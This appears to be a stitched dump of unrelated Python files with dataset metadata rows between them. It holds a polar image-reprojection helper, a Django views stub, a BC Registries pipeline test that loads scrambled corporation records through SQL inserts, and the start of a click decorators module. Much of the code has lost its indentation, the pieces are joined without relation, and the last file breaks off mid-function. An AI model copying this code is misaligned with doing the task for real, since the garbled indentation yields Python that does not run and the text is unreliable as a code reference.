def bin_by(x, y, nbins=30):
"""Bin x by y, given paired observations of x & y.
Returns the binned "x" values and the left edges of the bins."""
bins = np.linspace(y.min(), y.max(), nbins+1)
# To avoid extra bin for the max value
bins[-1] += 1
indicies = np.digitize(y, bins)
output = []
    for i in range(1, len(bins)):
output.append(x[indicies==i])
# Just return the left edges of the bins
bins = bins[:-1]
return output, bins
def reproject_image_into_polar(data, origin=None):
# Reprojects a 3D numpy array ("data") into a polar coordinate system.
# "origin" is a tuple of (x0, y0) and defaults to the center of the image.
ny, nx = data.shape[:2]
if origin is None:
origin = (nx//2, ny//2)
    # Determine what the min and max r and theta coords will be
x, y = index_coords(data, origin=origin)
r, theta = cart2polar(x, y)
# Make a regular (in polar space) grid based on the min and max r & theta
r_i = np.linspace(r.min(), r.max(), nx)
theta_i = np.linspace(theta.min(), theta.max(), ny)
theta_grid, r_grid = np.meshgrid(theta_i, r_i)
# Project the r and theta grid back into pixel coordinates
xi, yi = polar2cart(r_grid, theta_grid)
    xi += origin[0] # We need to shift the origin
    yi += origin[1] # back to the lower-left corner...
xi, yi = xi.flatten(), yi.flatten()
coords = np.vstack((xi, yi)) # (map_coordinates requires a 2xn array)
    # Reproject each band individually and then restack
    # (uses less memory than reprojecting the 3-dimensional array in one step)
bands = []
for band in data.T:
zi = sp.ndimage.map_coordinates(band, coords, order=1)
bands.append(zi.reshape((nx, ny)))
output = np.dstack(bands)
return output, r_i, theta_i
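# Added clarification: reproject_image_into_polar builds a regular (r, theta) grid spanning the
# image, maps every grid node back to pixel (x, y) coordinates with polar2cart, and resamples
# each band with scipy.ndimage.map_coordinates (order=1, i.e. bilinear interpolation).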
if __name__ == '__main__':
main()
| 30.941176
| 78
| 0.648561
|
0ff6d44f888b334920506c43455f300a3e542fe5
| 208
|
py
|
Python
|
tph/learn/views.py
|
ono-t01/django-rpi-tph-monitor
|
30894d937ece11f8c7d087dd735cd79b203f0cf4
|
[
"MIT"
] | null | null | null |
tph/learn/views.py
|
ono-t01/django-rpi-tph-monitor
|
30894d937ece11f8c7d087dd735cd79b203f0cf4
|
[
"MIT"
] | null | null | null |
tph/learn/views.py
|
ono-t01/django-rpi-tph-monitor
|
30894d937ece11f8c7d087dd735cd79b203f0cf4
|
[
"MIT"
] | null | null | null |
"""
Views controller.
@date 10 January 2020
@author mitsuhisaT <asihustim@gmail.com>
"""
import logging
from django.shortcuts import render
logger = logging.getLogger(__name__)
# Create your views here.
| 14.857143
| 40
| 0.764423
|
75458d4d45bd100783dd847892a4fdae5a238d95
| 30,667
|
py
|
Python
|
data-pipeline/bcreg/tests/bcreg_scenario_generation_test.py
|
esune/von-bc-registries-agent
|
712008543e579eee46be23c418f2eeb41626bfcd
|
[
"Apache-2.0"
] | 1
|
2019-09-06T07:40:15.000Z
|
2019-09-06T07:40:15.000Z
|
data-pipeline/bcreg/tests/bcreg_scenario_generation_test.py
|
esune/von-bc-registries-agent
|
712008543e579eee46be23c418f2eeb41626bfcd
|
[
"Apache-2.0"
] | null | null | null |
data-pipeline/bcreg/tests/bcreg_scenario_generation_test.py
|
esune/von-bc-registries-agent
|
712008543e579eee46be23c418f2eeb41626bfcd
|
[
"Apache-2.0"
] | 1
|
2019-06-12T13:47:22.000Z
|
2019-06-12T13:47:22.000Z
|
import time
from bcreg.bcregistries import BCRegistries, system_type, MIN_START_DATE, MAX_END_DATE
from bcreg.eventprocessor import EventProcessor
from bcreg.tests.sample_corps import sample_test_corps
def test_generate_corp_sql():
specific_corps = [
'A0059733','A0040189','A0059933','A0060938','A0060045',
]
with BCRegistries(True) as bc_registries:
for corp in specific_corps:
#print('=========================')
print('===== ', corp)
bc_registries.cache_bcreg_corp_tables([corp], True)
sqls = bc_registries.generated_sqls
fake_corp_num = bc_registries.add_generated_corp_num(corp)
print('=============>>> ', fake_corp_num)
#print('=========================')
#print('sqls:')
#for sql in sqls:
# print('"""' + sql.replace(' values ', '\nvalues\n') + '""",')
#print('=========================')
with BCRegistries(True) as cached_bc_reg:
cached_bc_reg.cache_bcreg_code_tables()
cached_bc_reg.insert_cache_sqls(sqls)
# try running with dummy event id zero
corp_info = cached_bc_reg.get_bc_reg_corp_info(fake_corp_num)
#print('-------------------------')
#print('corp_info:')
#print(corp_info)
#print('-------------------------')
start_event = {'event_id':0, 'event_date':MIN_START_DATE}
end_event = {'event_id':9999999999, 'event_date':MAX_END_DATE}
with EventProcessor() as event_processor:
corp_creds = event_processor.generate_credentials(system_type, start_event, end_event, fake_corp_num, corp_info)
#print('-------------------------')
#print('corp_creds:')
#print(corp_creds)
#print('-------------------------')
def test_specific_corp_scenario():
corp_num = '6096127'
corp_sqls = [
"""create table if not exists corp_party (corp_party_id numeric, mailing_addr_id numeric, delivery_addr_id numeric, corp_num text, party_typ_cd text, start_event_id numeric, end_event_id numeric, prev_party_id numeric, corr_typ_cd text, last_report_dt timestamp, appointment_dt timestamp, cessation_dt timestamp, last_nme text, middle_nme text, first_nme text, business_nme text, bus_company_num text, email_address text, corp_party_seq_num numeric, office_notification_dt timestamp, phone text, reason_typ_cd text)""",
"""insert into corp_party (corp_party_id, mailing_addr_id, delivery_addr_id, corp_num, party_typ_cd, start_event_id, end_event_id, prev_party_id, corr_typ_cd, last_report_dt, appointment_dt, cessation_dt, last_nme, middle_nme, first_nme, business_nme, bus_company_num, email_address, corp_party_seq_num, office_notification_dt, phone, reason_typ_cd)
values
(105820465, null, null, 'FM8694883', 'FBO', 105039871, null, null, null, null, '1981-07-03 00:00:00', null, null, null, null, '0641655Y QDSSDFWICJOJESKXZ ', '6096127', null, null, null, null, null)""",
"""create table if not exists event (event_id numeric, corp_num text, event_typ_cd text, event_timestmp timestamp, trigger_dts timestamp)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(5511129, '6096127', 'CONVICORP', '2004-03-26 20:36:00', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(5511130, '6096127', 'FILE', '2004-03-10 00:00:00', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(5511131, '6096127', 'FILE', '2004-03-10 00:00:00', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(5511132, '6096127', 'FILE', '2002-02-06 00:00:00', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(6245683, '6096127', 'ADCORP', '2005-04-20 16:02:27', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(6245701, '6096127', 'FILE', '2005-04-20 16:06:43', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(7055682, '6096127', 'FILE', '2006-04-12 14:37:52', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(7549434, '6096127', 'FILE', '2007-03-05 09:00:12', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(7591037, '6096127', 'FILE', '2007-03-28 15:16:53', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(9141401, '6096127', 'FILE', '2009-12-15 16:51:57', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(6245023, '6096127', 'FILE', '2005-04-20 15:48:29', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(8257866, '6096127', 'FILE', '2008-05-08 12:16:30', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(8855073, '6096127', 'FILE', '2009-06-04 10:32:15', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(8855876, '6096127', 'FILE', '2009-06-04 15:02:00', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(8855913, '6096127', 'FILE', '2009-06-04 15:11:53', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(9235934, '6096127', 'FILE', '2012-02-03 11:53:59', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(9235935, '6096127', 'FILE', '2012-02-03 11:54:30', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(105039871, 'FM8694883', 'CONVFMREGI', '1981-07-03 00:00:00', null)""",
"""create table if not exists filing (event_id numeric, filing_typ_cd text, effective_dt timestamp, change_dt timestamp, registration_dt timestamp, period_end_dt timestamp, accession_num text, arrangement_ind text, auth_sign_dt timestamp, withdrawn_event_id numeric, ods_typ_cd text, dd_event_id numeric, access_cd text, nr_num text, court_appr_ind text, court_order_num text, agm_date timestamp, new_corp_num text)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(5511130, 'CONVL', '2004-03-10 00:00:00', null, null, null, null, null, null, null, 'P ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(5511131, 'CONVL', '2004-03-10 00:00:00', null, null, null, null, null, null, null, 'P ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(5511132, 'CONVL', '2002-02-06 00:00:00', null, null, null, null, null, null, null, 'P ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(6245023, 'ANNBC', '2005-04-20 15:48:29', null, null, '2005-02-06 00:00:00', null, 'N', null, null, 'F ', null, '102532462', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(6245701, 'TRANS', '2005-04-20 16:06:43', null, null, null, null, 'N', null, null, 'F ', 6245701, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(7055682, 'ANNBC', '2006-04-12 14:37:52', null, null, '2006-02-06 00:00:00', null, 'N', null, null, 'F ', null, '105437040', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(7549434, 'ANNBC', '2007-03-05 09:00:12', null, null, '2007-02-06 00:00:00', null, 'N', null, null, 'F ', null, '108353590', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(7591037, 'NOALA', '2007-03-28 15:16:53', null, null, null, null, 'N', null, null, 'F ', 7591037, null, 'NR6422424', null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(8257866, 'ANNBC', '2008-05-08 12:16:30', null, null, '2008-02-06 00:00:00', null, 'N', null, null, 'F ', null, '111282232', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(8855073, 'ANNBC', '2009-06-04 10:32:15', null, null, '2009-02-06 00:00:00', null, 'N', null, null, 'F ', null, '114301161', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(8855876, 'NOALU', '2009-06-04 15:02:00', null, null, null, null, 'N', null, null, 'F ', 8855876, null, 'NR8796381', null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(8855913, 'NOCDR', '2009-06-04 15:11:53', null, null, null, null, 'N', null, null, 'F ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(9141401, 'NOCAD', '2009-12-16 00:01:00', null, null, null, null, 'N', null, null, 'F ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(9235934, 'ANNBC', '2012-02-03 11:53:59', null, null, '2010-02-06 00:00:00', null, 'N', null, null, 'F ', null, '117411967', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(9235935, 'ANNBC', '2012-02-03 11:54:30', null, null, '2011-02-06 00:00:00', null, 'N', null, null, 'F ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(105039871, 'FRREG', '1981-07-03 00:00:00', null, null, null, null, null, null, null, 'P ', null, null, null, null, null, null, null)""",
"""create table if not exists corporation (corp_num text, corp_frozen_typ_cd text, corp_typ_cd text, recognition_dts timestamp, last_ar_filed_dt timestamp, transition_dt timestamp, bn_9 text, bn_15 text, accession_num text, corp_password text, prompt_question text, admin_email text, send_ar_ind text, tilma_involved_ind text, tilma_cessation_dt timestamp, firm_last_image_date timestamp, os_session integer, last_agm_date timestamp, firm_lp_xp_termination_date timestamp, last_ledger_dt timestamp, ar_reminder_option text, ar_reminder_date text, temp_password text, temp_password_expiry_date timestamp)""",
"""insert into corporation (corp_num, corp_frozen_typ_cd, corp_typ_cd, recognition_dts, last_ar_filed_dt, transition_dt, bn_9, bn_15, accession_num, corp_password, prompt_question, admin_email, send_ar_ind, tilma_involved_ind, tilma_cessation_dt, firm_last_image_date, os_session, last_agm_date, firm_lp_xp_termination_date, last_ledger_dt, ar_reminder_option, ar_reminder_date, temp_password, temp_password_expiry_date)
values
('6096127', null, 'ULC', '2002-02-06 00:00:00', '2011-02-06 00:00:00', '2005-04-20 16:06:43', null, null, null, 'DXACRIXX', 'IKMQPBMP', null, 'N', 'N', null, null, null, null, null, null, null, null, null, null)""",
"""insert into corporation (corp_num, corp_frozen_typ_cd, corp_typ_cd, recognition_dts, last_ar_filed_dt, transition_dt, bn_9, bn_15, accession_num, corp_password, prompt_question, admin_email, send_ar_ind, tilma_involved_ind, tilma_cessation_dt, firm_last_image_date, os_session, last_agm_date, firm_lp_xp_termination_date, last_ledger_dt, ar_reminder_option, ar_reminder_date, temp_password, temp_password_expiry_date)
values
('FM8694883', null, 'SP', '1981-07-03 00:00:00', null, null, null, null, null, null, null, null, null, 'N', null, null, null, null, null, null, null, null, null, null)""",
"""create table if not exists conv_event (event_id numeric, effective_dt timestamp, report_corp_ind text, prev_bc_ind text, activity_user_id text, activity_dt timestamp, activity_tm timestamp, annual_file_dt timestamp, corp_cre_typ_cd text, accession_num text, dd_event_id numeric, remarks text)""",
"""create table if not exists corp_state (corp_num text, start_event_id numeric, end_event_id numeric, state_typ_cd text, dd_corp_num text)""",
"""insert into corp_state (corp_num, start_event_id, end_event_id, state_typ_cd, dd_corp_num)
values
('6096127', 5511129, null, 'ACT', null)""",
"""insert into corp_state (corp_num, start_event_id, end_event_id, state_typ_cd, dd_corp_num)
values
('FM8694883', 105039871, null, 'ACT', null)""",
"""create table if not exists tilma_involved (tilma_involved_id text, corp_num text, start_event_id text, end_event_id text, tilma_jurisdiction text, nuans_number text, nuans_expiry_date timestamp, nr_number text, jurisdiction_num text, jurisdiction_reg_date timestamp, can_number text, jurisdiction_assumed_name text, assumed_nuans_number text, assumed_nuans_name text, assumed_nuans_expiration_date timestamp, involved_ind text, cessation_date timestamp)""",
"""create table if not exists jurisdiction (corp_num text, start_event_id numeric, end_event_id numeric, dd_corp_num text, can_jur_typ_cd text, xpro_typ_cd text, home_recogn_dt timestamp, othr_juris_desc text, home_juris_num text, bc_xpro_num text, home_company_nme text, other_juris_party_id text)""",
"""create table if not exists corp_name (corp_num text, corp_name_typ_cd text, start_event_id numeric, corp_name_seq_num numeric, end_event_id numeric, srch_nme text, corp_nme text, dd_corp_num text)""",
"""insert into corp_name (corp_num, corp_name_typ_cd, start_event_id, corp_name_seq_num, end_event_id, srch_nme, corp_nme, dd_corp_num)
values
('6096127', 'CO', 8855876, 1, null, 'ZRNSHTSBJWOFBYGLINWP', 'QZITQDNKIDIZKUWBCR RHFJMH', null)""",
"""insert into corp_name (corp_num, corp_name_typ_cd, start_event_id, corp_name_seq_num, end_event_id, srch_nme, corp_nme, dd_corp_num)
values
('6096127', 'CO', 5511129, 0, 7591037, 'PYWAJCFUEPLUIRTCNQQB', 'OSZUOXJZVZSYKYTAADRNOPHPR', null)""",
"""insert into corp_name (corp_num, corp_name_typ_cd, start_event_id, corp_name_seq_num, end_event_id, srch_nme, corp_nme, dd_corp_num)
values
('6096127', 'CO', 7591037, 1, 8855876, 'SXDEUETULEXXDMCYWTYK', 'BTNLFMWTESSLUJCWYI GBLQAY', null)""",
"""insert into corp_name (corp_num, corp_name_typ_cd, start_event_id, corp_name_seq_num, end_event_id, srch_nme, corp_nme, dd_corp_num)
values
('FM8694883', 'CO', 105039871, 0, null, 'TPTPYBIICTYEVFMKKPCF', 'FLOHTOGCRGKGIPWBZHDUZLFZC', null)""",
"""create table if not exists office (corp_num text, office_typ_cd text, start_event_id numeric, end_event_id numeric, mailing_addr_id numeric, delivery_addr_id numeric, dd_corp_num text, email_address text)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RC', 6245701, 9141401, 2836997, 2836996, null, null)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RG', 6245701, 9141401, 2836999, 2836998, null, null)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RG', 5511129, 6245701, 1606746, 1606746, null, null)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RC', 5511129, 6245701, 1606746, 1606746, null, null)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RG', 9141401, null, 7404645, 7404644, null, null)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RC', 9141401, null, 7404643, 7404642, null, null)""",
"""create table if not exists address (addr_id numeric, province text, country_typ_cd text, postal_cd text, addr_line_1 text, addr_line_2 text, addr_line_3 text, city text, address_format_type text, address_desc text, address_desc_short text, delivery_instructions text, unit_no text, unit_type text, civic_no text, civic_no_suffix text, street_name text, street_type text, street_direction text, lock_box_no text, installation_type text, installation_name text, installation_qualifier text, route_service_type text, route_service_no text, province_state_name text)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(1606746, 'BC', 'CA', 'MHIFWS', 'JYFSNUJMIOZINBMIQYCUDUSAR', 'BAMEPDCRMR YDZWOJPGVFWLTJ', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(2836996, 'BC', 'CA', '5JFPB2', 'VPDBKQIF XSDDIFT NLPEIOMV', null, null, 'VANCOUVER', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(2836997, 'BC', 'CA', 'A645UW', 'PNIVFCTTGZSTCNCLSUFCHG ZK', null, null, 'VANCOUVER', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(2836998, 'BC', 'CA', 'TNOGDH', ' WCYXRKOAAPNTOKSB WFYGGEV', null, null, 'VANCOUVER', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(2836999, 'BC', 'CA', '4OK4EI', ' HELE CXXVVWCNATIDDBXAEEU', null, null, 'VANCOUVER', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(7404642, 'BC', 'CA', 'VSX7G8', 'AADWCOLUFJSASZQBFCWMOHJHN', 'WTVJIGYKXAHGZTYEEBRGLIDLO', null, 'Vancouver', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(7404643, 'BC', 'CA', 'C8886D', 'ZXXIBPHZQJBRXTTQRO HCSRAI', 'BYSCABJETMIFAX MIHLBTBAAE', null, 'Vancouver', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(7404644, 'BC', 'CA', 'VYXN94', 'RIILJCAEYEHMTZFGLJMLEOPHE', 'RNVOLRLYGKSWKKOUUEE FYOUO', null, 'Vancouver', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
"""insert into address (addr_id, province, country_typ_cd, postal_cd, addr_line_1, addr_line_2, addr_line_3, city, address_format_type, address_desc, address_desc_short, delivery_instructions, unit_no, unit_type, civic_no, civic_no_suffix, street_name, street_type, street_direction, lock_box_no, installation_type, installation_name, installation_qualifier, route_service_type, route_service_no, province_state_name)
values
(7404645, 'BC', 'CA', '2IFBB1', 'QUAETPPSJOXNSKSYYVY NWPHK', 'IWLXVNQKIAYDNUUGKDZRVSBYM', null, 'Vancouver', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null)""",
]
with BCRegistries(True) as cached_bc_reg:
cached_bc_reg.cache_bcreg_code_tables()
cached_bc_reg.insert_cache_sqls(corp_sqls)
# try running with dummy event id zero
corp_info = cached_bc_reg.get_bc_reg_corp_info(corp_num)
#print('-------------------------')
#print('corp_info:')
#print(corp_info)
#print('-------------------------')
start_event = {'event_id':0, 'event_date':MIN_START_DATE}
end_event = {'event_id':9999999999, 'event_date':MAX_END_DATE}
with EventProcessor() as event_processor:
corp_creds = event_processor.generate_credentials(system_type, start_event, end_event, corp_num, corp_info)
#print('-------------------------')
#print('corp_creds:')
#print(corp_creds)
#print('-------------------------')
# no assertions, just make sure all test data is working
def test_preset_corp_scenario_all():
for test_corp in sample_test_corps.keys():
corp_num = sample_test_corps[test_corp]['corp_num']
corp_sqls = sample_test_corps[test_corp]['sqls']
with BCRegistries(True) as cached_bc_reg:
cached_bc_reg.cache_bcreg_code_tables()
cached_bc_reg.insert_cache_sqls(corp_sqls)
corp_info = cached_bc_reg.get_bc_reg_corp_info(corp_num)
start_event = {'event_id':0, 'event_date':MIN_START_DATE}
end_event = {'event_id':9999999999, 'event_date':MAX_END_DATE}
with EventProcessor() as event_processor:
corp_creds = event_processor.generate_credentials(system_type, start_event, end_event, corp_num, corp_info)
#print("Corp: " + corp_num + " generated " + str(len(corp_creds)) + " credentials")
# load a specific corporation and make some assertions on the generated credentials
def test_preset_corp_scenario_3dbas():
# use corp corp_A5589691
corp_num = sample_test_corps['corp_A5589691']['corp_num']
corp_sqls = sample_test_corps['corp_A5589691']['sqls']
with BCRegistries(True) as cached_bc_reg:
cached_bc_reg.cache_bcreg_code_tables()
cached_bc_reg.insert_cache_sqls(corp_sqls)
corp_info = cached_bc_reg.get_bc_reg_corp_info(corp_num)
start_event = {'event_id':0, 'event_date':MIN_START_DATE}
end_event = {'event_id':9999999999, 'event_date':MAX_END_DATE}
with EventProcessor() as event_processor:
corp_creds = event_processor.generate_credentials(system_type, start_event, end_event, corp_num, corp_info)
#print(corp_creds)
assert len(corp_creds) == 6
assert corp_creds[1]['cred_type'] == 'REG'
assert corp_creds[2]['cred_type'] == 'ADDR'
assert corp_creds[3]['cred_type'] == 'REL'
assert corp_creds[4]['cred_type'] == 'REL'
assert corp_creds[5]['cred_type'] == 'REL'
| 102.565217
| 619
| 0.69671
|
7b28fc9e2a06ba75944fa9f03de47a767c89d64e
| 2,051
|
py
|
Python
|
kiwi_scp/commands/decorators.py
|
yavook/kiwi-scp
|
ca4263d913cfbdedc8b14334e3cad61c3b95f0a7
|
[
"MIT"
] | null | null | null |
kiwi_scp/commands/decorators.py
|
yavook/kiwi-scp
|
ca4263d913cfbdedc8b14334e3cad61c3b95f0a7
|
[
"MIT"
] | null | null | null |
kiwi_scp/commands/decorators.py
|
yavook/kiwi-scp
|
ca4263d913cfbdedc8b14334e3cad61c3b95f0a7
|
[
"MIT"
] | null | null | null |
from typing import Callable, Type, Optional, Tuple
import click
from .cmd import KiwiCommandType, KiwiCommand
from ..instance import Instance
_pass_instance = click.make_pass_decorator(
Instance,
ensure=True,
)
_project_arg = click.argument(
"project_name",
metavar="PROJECT",
type=str,
)
_projects_arg = click.argument(
"project_names",
metavar="[PROJECT]...",
nargs=-1,
type=str,
)
_services_arg_p = click.argument(
"project_name",
metavar="[PROJECT]",
required=False,
type=str,
)
_services_arg_s = click.argument(
"service_names",
metavar="[SERVICE]...",
nargs=-1,
type=str,
)
def kiwi_command(
**decorator_kwargs,
) -> Callable:
